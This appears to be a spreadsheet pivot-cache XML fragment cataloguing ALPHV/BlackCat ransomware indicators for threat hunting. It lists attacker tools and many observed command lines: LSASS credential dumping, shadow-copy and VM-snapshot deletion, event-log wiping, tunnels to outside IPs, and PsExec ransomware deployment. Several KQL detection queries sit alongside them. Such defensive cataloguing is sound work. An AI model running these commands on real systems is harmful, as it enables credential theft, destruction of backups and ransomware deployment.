    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="alphv-eid0004"/>
    <s v="cobaltstr-pid"/>
    <s v="c2"/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0027"/>
    <s v="comsvcs-pid, rundll-pid"/>
    <s v="cmdline"/>
    <s v="powershell rundll32.exe c:\windows\system32\comsvcs.dll, minidump (get-process lsass).id c:\temp\lsass.dmp full"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0026"/>
    <s v="dumpert-pid"/>
    <s v="file_path"/>
    <s v="c:\windows\system\dumpert.exe lsass.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0024"/>
    <s v="gmer-pid"/>
    <s v="file_path"/>
    <s v="c:\users\&lt;username&gt;\downloads\gmer\gmer.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0017"/>
    <s v="lsass-pid"/>
    <s v="generic"/>
    <s v="TA used HOK taskmgr dump lsass"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0107"/>
    <s v="lsass-pid"/>
    <s v="generic"/>
    <s v="Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive."/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0003"/>
    <s v="mimikatz-pid"/>
    <s v="htool"/>
    <s v="Mimikatz"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0101"/>
    <s v="netclt-pid"/>
    <s v="cmdline"/>
    <s v="net use \\[computer name]  /user:[domain]\[user] [password] /persistent:no"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0008"/>
    <s v="netscan-pid"/>
    <s v="htool"/>
    <s v="Softperfect Netscan"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0036"/>
    <s v="netsh-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c netsh advfirewall firewall add rule name=service dir=in protocol=tcp localport=5985 action=permit 1&gt; \\127.0.0.1\c$\windows\temp\qaiumg 2&gt;&amp;1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0025"/>
    <s v="procdump-pid"/>
    <s v="cmdline"/>
    <s v="c:\windows\system\procdump.exe -accepteula -ma lsass.exe lsass.dmp"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0006"/>
    <s v="psexec-pid"/>
    <s v="htool"/>
    <s v="PsExec"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0118"/>
    <s v="psexec-pid"/>
    <s v="htool"/>
    <s v="PsExec"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0016"/>
    <s v="pshell-pid"/>
    <s v="cmdline"/>
    <s v="&quot;C:\&lt;path&gt;\v1.0\powershell.exe -WindowStlye Hidden -C $path = 'C:\Users\user\Desktop\&lt;name&gt;.exe; Get-Process | Where-Object {$_.Path -like $path} | Stop-Process -Force;[byte[]]$arr = new-object byte[] 65536;Set-Content -Path $path -Value $arr;Remove-Item -Path $path;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0041"/>
    <s v="registry-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c reg add hkey_local_machine\system\currentcontrolset\control\lsa /v disablerestrictedadmin /t reg_dword /d 0 1&gt; \\127.0.0.1\admin\$\__&lt;timestamp&gt;\.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0014"/>
    <s v="rubeus-pid"/>
    <s v="htool"/>
    <s v="Rubeus"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0032"/>
    <s v="teamvwr-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c teamviewer.exe --getid cmd.exe /q /c dir c:&quot;program files cmd.exe /q /c dir c:&quot;program files (x86) 1 cmd.exe /q /c dir c:&quot;program files (x86)\teamviewer\ cmd.exe /q /c c:&quot;program files (x86)\teamviewer\teamviewer.exe --getid"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0033"/>
    <s v="teamvwr-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c c:&quot;program files (x86)\teamviewer\teamviewer.exe -info"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0094"/>
    <s v="vss-pid"/>
    <s v="cmdline"/>
    <s v="vssadmin.exe Delete Shadows /all /quiet"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0104"/>
    <s v="vss-pid"/>
    <s v="cmdline"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “vssadmin.exe Delete Shadows /all /quiet”"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0052"/>
    <s v="vss-pid, wmic-pid"/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\cmd.exe /c vssadmin.exe delete shadows /all /quiet c:\windows\system32\cmd.exe /c wmic.exe shadowcopy delete c:\windows\system32\cmd.exe /c arp -a c:\windows\system32\cmd.exe /c bcdedit /set {default}"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0095"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="wmic.exe Shadowcopy Delete"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0096"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="wmic csproduct get UUID"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0105"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “wmic.exe Shadowcopy Delete”"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0060"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “wmic.exe Shadowcopy Delete”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0065"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “wmic csproduct get UUID”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0067"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="wmic csproduct get UUID"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0073"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="wmic shaodwcopy delete"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0080"/>
    <s v="wmic-pid"/>
    <s v="cmdline"/>
    <s v="wmic csproduct get UUID "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0001"/>
    <m/>
    <s v="generic"/>
    <s v="Targets_x000a_• Windows, 7 to 11, as well as Server 2008r2, 2012,_x000a_2016, 2019, 2022 (XP and 2003 can be encrypted_x000a_over Server Message Block_x000a_• ESXI (at least versions 5.5, 6.5, 7.0.2u)_x000a_• Debian (at least versions 7,8 and 9)_x000a_• Ubuntu (at least versions 18.04 and 20.04)_x000a_• ReadyNAS_x000a_• Synology"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0002"/>
    <m/>
    <s v="htool"/>
    <s v="Nirsoft"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0005"/>
    <m/>
    <s v="htool"/>
    <s v="ADRecon"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0007"/>
    <m/>
    <s v="htool"/>
    <s v="Emotet"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0009"/>
    <m/>
    <s v="htool"/>
    <s v="Bloodhound"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0010"/>
    <m/>
    <s v="htool"/>
    <s v="CrackMapExec"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0011"/>
    <m/>
    <s v="htool"/>
    <s v="MegaSync"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0012"/>
    <m/>
    <s v="htool"/>
    <s v="InVeigh"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0015"/>
    <m/>
    <s v="htool"/>
    <s v="StealBit"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="alphv-eid0018"/>
    <m/>
    <s v="generic"/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -command  &amp; {(get-content c:\system -raw | set-content c:\ -stream 'cachetask')}_x000a__x000a_c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f_x000a__x000a_c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask"/>
    <s v="During the BlackCat attack, the actors used a tool called reverse-ssh, compiled with the C2 server address embedded, to set up reverse SSH tunnels and provide reverse shells to the attacker. Reverse-ssh was deployed to C:\ directory and named: system, Windows or cache task._x000a__x000a_It was also observed hidden by writing to an alternate data stream (ADS) of the C:\ directory using the following command:"/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0019"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\schtasks.exe /create /ru system /sc minute /tn microsoft\windows\wininet\cachetask /tr c:\:cachetask -b &lt;bind port&gt; /f"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0020"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\schtasks.exe /run /tn microsoft\windows\wininet\cachetask"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0021"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\reg.exe add hklm\software\microsoft\windows nt\currentversion\image file execution options\taskmgr.exe /v debugger /t reg_sz /d c:\system"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0022"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1116/127.0.0.1:3388 -f mwss://52[.]149[.]228[.]45:443 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows wsus update /tr c:\windows\temp\system.exe -l socks5://127.0.0.1:3388 /st 12:00 /f cmd.exe /q /c schtasks /create /ru system /sc hourly /tn windows defender /tr c:\windows\temp\system.exe -l rtcp://0.0.0.0:1117/127.0.0.1:3388 -f mwss://20[.]46[.]245[.]56:443 /st 12:00 /f"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0023"/>
    <m/>
    <s v="file_path"/>
    <s v="c:\windows\system32\wevtutil.exe set-log microsoft-windows-taskscheduler/operational /enabled:false"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0028"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c cd results 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c dir 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1  cmd.exe /q /c del archive.zip 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1 cmd.exe /q /c del c:\steal.exe 1&gt; \\127.0.0.1\admin$\__&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0029"/>
    <m/>
    <s v="htool"/>
    <s v="hackbrowerdata "/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0030"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255 cmd.exe /c c:\programdata\system\svchost.exe /hide /auto:c:\programdata\system\192.xml /range:192.168.0.0-192.168.255.255"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0031"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\adrecon.ps1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0034"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c dir c:&quot;program files (x86)\_x000a_cmd.exe /q /c dir c:&quot;program files (x86)&quot;keepass password safe 2\_x000a_cmd.exe /q /c type c:&quot;program files (x86)&quot;keepass password safe 2\keepass.exe.config"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0035"/>
    <m/>
    <s v="cmdline"/>
    <s v="1&gt; \\127.0.0.1\admin$\__&lt;timestamp&gt;.&lt;6 digits&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0037"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\wevtutil.exe set-log active directory web services /enabled:false"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0038"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\wevtutil.exe set-log application /enabled:false"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0039"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\wevtutil.exe set-log hardwareevents /enabled:false"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0040"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\wevtutil.exe set-log internet explorer /enabled:false"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0042"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c #upload c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0043"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c #download c:\users\&lt;user&gt;\documents\&lt;doc&gt; /home/kali/desktop/&lt;doc&gt; 1&gt; \\127.0.0.1\admin$\&lt;num&gt;.&lt;num&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0044"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\windowspowershell\v1.0\powershell.exe -exec bypass .\apply.ps1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0045"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /q /c gpupdate /force"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0046"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\defender.vbs"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0047"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c \\&lt;domaincontroller&gt;\netlogon\def.vbs"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0048"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe --access-token &lt;token&gt;"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0049"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe -c \\&lt;domain controller&gt;\netlogon\&lt;num&gt;.exe"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0050"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2l:1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0051"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\cmd.exe /c reg add hkey_local_machine\system\currentcontrolset\services\lanmanserver\parameters /v maxmpxct /d 65535 /t reg_dword /f c:\windows\system32\cmd.exe /c fsutil behavior set symlinkevaluation r2r:1"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0053"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\cmd.exe /c cmd.exe /c for /f &quot;tokens=*&quot; %1 in ('wevtutil.exe el') do wevtutil.exe cl &quot;%1&quot;"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0054"/>
    <m/>
    <s v="cmdline"/>
    <s v="c:\windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled no"/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="alphv-eid0055"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “arp -a”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0056"/>
    <m/>
    <s v="cmdline"/>
    <s v="/c “reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0057"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl %1"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0058"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “bcdedit /set {default} recoveryenabled No”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0059"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “bcdedit /set {default}”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0061"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “vssadmin.exe Delete Shadows /all /quiet”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0062"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “iisreset.exe /stop”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0063"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “fsutil behavior set SymlinkEvaluation R2R:1”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0064"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c “fsutil behavior set SymlinkEvaluation R2L:1”"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0066"/>
    <m/>
    <s v="named_pipe"/>
    <s v="\\.\pipe\__rust_anonymous_pipe1__.&lt;Process ID&gt;.&lt;Random number&gt;"/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="alphv-eid0068"/>
    <m/>
    <s v="cmdline"/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0069"/>
    <m/>
    <s v="cmdline"/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0070"/>
    <m/>
    <s v="cmdline"/>
    <s v="iisreset.exe /stop"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0071"/>
    <m/>
    <s v="cmdline"/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0072"/>
    <m/>
    <s v="cmdline"/>
    <s v="vssadmin.exe delete shadows /all /quiet"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0074"/>
    <m/>
    <s v="cmdline"/>
    <s v="bcdedit /set {default} recoveryenabled No"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0075"/>
    <m/>
    <s v="cmdline"/>
    <s v="cmd.exe /c for /F \&quot;tokens=*\&quot; %1 in ('wevtutil.exe el') DO wevtutil.exe cl \&quot;%1\&quot; "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0076"/>
    <m/>
    <s v="cmdline"/>
    <s v="esxcli --formatter=csv --format-param=fields==&quot;WorldID,DisplayName&quot; vm process list "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0077"/>
    <m/>
    <s v="cmdline"/>
    <s v="awk -F &quot;\&quot;*,\&quot;*&quot; '{system(&quot;esxcli vm process kill --type=force --world-id=&quot;$1)}' "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0078"/>
    <m/>
    <s v="cmdline"/>
    <s v="for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done"/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0079"/>
    <m/>
    <s v="file_path"/>
    <s v=" “D:\my\Documents\Visual Studio 2019\setup\obj\Release\setup.pdb”. "/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <s v="alphv-eid0081"/>
    <m/>
    <s v="cmdline"/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0082"/>
    <m/>
    <s v="cmdline"/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1 "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0083"/>
    <m/>
    <s v="cmdline"/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0084"/>
    <m/>
    <s v="cmdline"/>
    <s v="psexec.exe -accepteula \\&lt;TARGET_HOST&gt; -u &lt;USERNAME&gt; -p &lt;PASSWORD&gt; -s -d -f -c &lt;ALPHV_EXECUTABLE&gt; [FLAGS] [OPTIONS] --access-token &lt;ACCESS_TOKEN&gt; [SUBCOMMAND] "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0085"/>
    <m/>
    <s v="cmdline"/>
    <s v="vssadmin.exe delete shadows /all /quiet "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0086"/>
    <m/>
    <s v="cmdline"/>
    <s v="arp -a "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0087"/>
    <m/>
    <s v="cmdline"/>
    <s v="HKEY_USERS\&lt;SID&gt;\Control Panel\Desktop\WallPaper = &quot;C:\\Users\\&lt;USERNAME&gt;\\Desktop\\RECOVER-&lt;ENCRYPTED_FILE_EXTENSION&gt;-FILES.txt.png&quot; "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0088"/>
    <m/>
    <s v="cmdline"/>
    <s v="for /F \&quot;tokens=*\&quot; %1 in ('wevtutil.exe el') DO wevtutil.exe cl \&quot;%1\&quot;&quot; "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0089"/>
    <m/>
    <s v="cmdline"/>
    <s v="esxcli --formatter=csv --format-param=fields==&quot;WorldID,DisplayName&quot; vm process list "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0090"/>
    <m/>
    <s v="cmdline"/>
    <s v="awk -F &quot;\&quot;*,\&quot;*&quot; '{system(&quot;esxcli vm process kill --type=force --world-id=&quot;$1)}' "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0091"/>
    <m/>
    <s v="cmdline"/>
    <s v="for i in `vim-cmd vmsvc/getallvms| awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0092"/>
    <m/>
    <s v="cmdline"/>
    <s v="esxcli --formatter=csv --format-param=fields==&quot;WorldID,DisplayName&quot; vm process list | awk -F &quot;\&quot;*,\&quot;*&quot; '{system(&quot;esxcli vm process kill --type=force --world-id=&quot;$1)}' "/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0093"/>
    <m/>
    <s v="cmdline"/>
    <s v="for i in `vim-cmd vmsvc/getallvms | awk '{print$1}'`;do vim-cmd vmsvc/snapshot.removeall $i &amp; done"/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="alphv-eid0097"/>
    <m/>
    <s v="cmdline"/>
    <s v="reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services \LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0098"/>
    <m/>
    <s v="cmdline"/>
    <s v="for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\”"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0099"/>
    <m/>
    <s v="cmdline"/>
    <s v="fsutil behavior set SymlinkEvaluation R2L:1"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0100"/>
    <m/>
    <s v="cmdline"/>
    <s v="fsutil behavior set SymlinkEvaluation R2R:1"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0102"/>
    <m/>
    <s v="cmdline"/>
    <s v="C:\Windows\system32\cmd.exe” /c “bcdedit /set {default}”"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0103"/>
    <m/>
    <s v="cmdline"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “bcdedit /set {default} recoveryenabled No”"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0106"/>
    <m/>
    <s v="cmdline"/>
    <s v="“C:\Windows\system32\cmd.exe” /c “cmd.exe /c  for /F \”tokens=*\” Incorrect function. in (‘ wevtutil.exe el ‘) DO wevtutil.exe cl \”Incorrect function. \””"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0108"/>
    <m/>
    <s v="cmdline"/>
    <s v="Get-ADRGPO"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0109"/>
    <m/>
    <s v="cmdline"/>
    <s v="Get-ADRDNSZone"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0110"/>
    <m/>
    <s v="cmdline"/>
    <s v="Get-ADRGPLink"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0111"/>
    <m/>
    <s v="mdeav_alert"/>
    <s v="An active ‘BlackCat’ ransomware was detected_x000a_‘BlackCat’ ransomware was detected_x000a_BlackCat ransomware"/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0112"/>
    <m/>
    <s v="kql"/>
    <s v="DeviceProcessEvents_x000a_| where InitiatingProcessFolderPath has &quot;PerfLogs&quot;_x000a_| where InitiatingProcessFileName matches regex &quot;[a-z]{3}.exe&quot;_x000a_| extend Length = strlen(InitiatingProcessFileName)_x000a_| where Length == 7"/>
    <s v="Suspicious process execution in PerfLogs path"/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0113"/>
    <m/>
    <s v="kql"/>
    <s v="DeviceProcessEvents_x000a_| where ProcessCommandLine has_all(&quot;LanmanServer&quot;, &quot;parameters&quot;, &quot;MaxMpxCt&quot;, &quot;65535&quot;)"/>
    <s v="Suspicious registry modification of MaxMpxCt parameters"/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0114"/>
    <m/>
    <s v="kql"/>
    <s v="DeviceProcessEvents_x000a_| where ProcessCommandLine has_all(&quot;--access-token&quot;, &quot;-v&quot;) _x000a_| extend CommandArguments = split(ProcessCommandLine, &quot; &quot;)_x000a_| mv-expand CommandArguments_x000a_| where CommandArguments matches regex &quot;^[A-Fa-f0-9]{64}$&quot;"/>
    <s v="Suspicious command line indicative of BlackCat ransom payload execution"/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0115"/>
    <m/>
    <s v="kql"/>
    <s v="DeviceProcessEvents_x000a_| where InitiatingProcessCommandLine has &quot;--access-token&quot;_x000a_| where ProcessCommandLine has &quot;get uuid&quot;"/>
    <s v="Suspicious command line indicative of BlackCat ransom payload execution"/>
    <x v="3"/>
  </r>
  <r>
    <s v="alphv-eid0116"/>
    <m/>
    <s v="kql"/>
    <s v="DeviceNetworkEvents_x000a_| where InitiatingProcessCommandLine has_all(&quot;copy&quot;, &quot;--max-age&quot;, &quot;--ignore-existing&quot;, &quot;--multi-thread-streams&quot;, &quot;--transfers&quot;) and InitiatingProcessCommandLine has_any(&quot;ftp&quot;, &quot;ssh&quot;, &quot;-q&quot;)"/>
